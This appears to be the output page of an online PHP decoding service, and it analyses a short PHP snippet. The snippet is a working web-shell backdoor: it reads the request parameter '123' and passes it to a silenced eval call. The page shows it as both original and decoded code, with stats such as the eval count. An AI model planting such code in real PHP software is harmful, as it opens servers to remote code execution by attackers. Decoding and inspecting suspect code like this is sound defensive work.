Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php for ($x=0; $x<=1; $x++) { $C[1] = $_REQUEST["123"]; @eval ..

Decoded Output download

<?php  
for ($x=0; $x<=1; $x++) { 
        $C[1] = $_REQUEST["123"]; 
        @eval 
        ($C[$x].""); 
}  
?>

Did this file decode correctly?

Original Code

<?php 
for ($x=0; $x<=1; $x++) {
        $C[1] = $_REQUEST["123"];
        @eval
        ($C[$x]."");
} 
?>

Function Calls

None

Variables

$C [{'key': 1, 'value': None}]
$x 0

Stats

MD5 c0b32901f9c6ce3f965b8552f7d058d4
Eval Count 1
Decode Time 58 ms